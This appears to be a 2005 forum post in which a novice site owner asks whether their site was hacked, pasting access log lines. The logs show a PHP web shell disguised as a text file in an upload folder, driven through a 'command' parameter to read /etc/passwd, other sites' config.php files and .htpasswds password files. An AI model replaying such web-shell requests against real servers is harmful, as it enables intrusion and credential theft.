Did my site get hacked? I'm a stupid newb and dont understand..pls help me

Ok, I got my hands on my access logs. This is the background: I installed a upload script to my web site with an .htaccess file that was suppose to have blocked parsing of php files, too bad my web host doesn't complile mod_php - btw, I have no clue what the previous sentence means, I just wrote according to my web host told me.

Anyways, here is what I've found:
/upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome%2Fmakecomm%2Fpublic_html&command= HTTP/1.1" 200 3081 "http://makecommercefun.com/upload/user_upload/sa.htm.php.txt.txt

what does that mean? Did he gain access to my files? The file he uploaded tried to disguise itself as a plain txt file, but is infact a php script.

And more: 62.3.32.52 - - [05/Jul/2005:00:56:35 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome%2Fmakecomm%2Fpublic_html&command= HTTP/1.1" 200 3074 "http://makecommercefun.com/upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome%2Fmakecomm%2Fpublic_html&command=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

62.3.32.52 - - [05/Jul/2005:00:57:15 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=cat%20/etc/passwd HTTP/1.1" 200 10315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

^ Does the above mean he has my pw??

62.3.32.53 - - [05/Jul/2005:01:01:35 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=cat%20/home/harbnet/www/config.php HTTP/1.1" 200 3249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


62.3.32.54 - - [05/Jul/2005:01:17:21 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=cat%20/home/harbnet/www/nuke/config.php HTTP/1.1" 200 5028 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

62.3.32.53 - - [05/Jul/2005:01:21:31 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/www/phpAdsNew/ HTTP/1.1" 200 2153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

62.3.32.52 - - [05/Jul/2005:01:32:16 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/ HTTP/1.1" 200 1900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.52 - - [05/Jul/2005:01:32:26 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/aa HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

62.3.32.53 - - [05/Jul/2005:01:32:32 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/aa/ HTTP/1.1" 200 1770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.53 - - [05/Jul/2005:01:32:42 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/_private/ HTTP/1.1" 200 1775 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.53 - - [05/Jul/2005:01:32:49 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/vb/ HTTP/1.1" 200 1787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.52 - - [05/Jul/2005:01:32:55 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=ls%20/home/harbnet/.htpasswds/vb/admin/ HTTP/1.1" 200 1800 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.52 - - [05/Jul/2005:01:33:05 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=cat%20%20/home/harbnet/.htpasswds/vb/admin/passwd HTTP/1.1" 200 1832 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.3.32.53 - - [05/Jul/2005:01:34:28 -0400] "GET /upload/user_upload/sa.htm.php.txt.txt?work_dir=%2Fhome&command=cat%20%20/home/harbnet/.htpasswds/vb/mod/passwd HTTP/1.1" 200 1917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

 

 

 

 

Top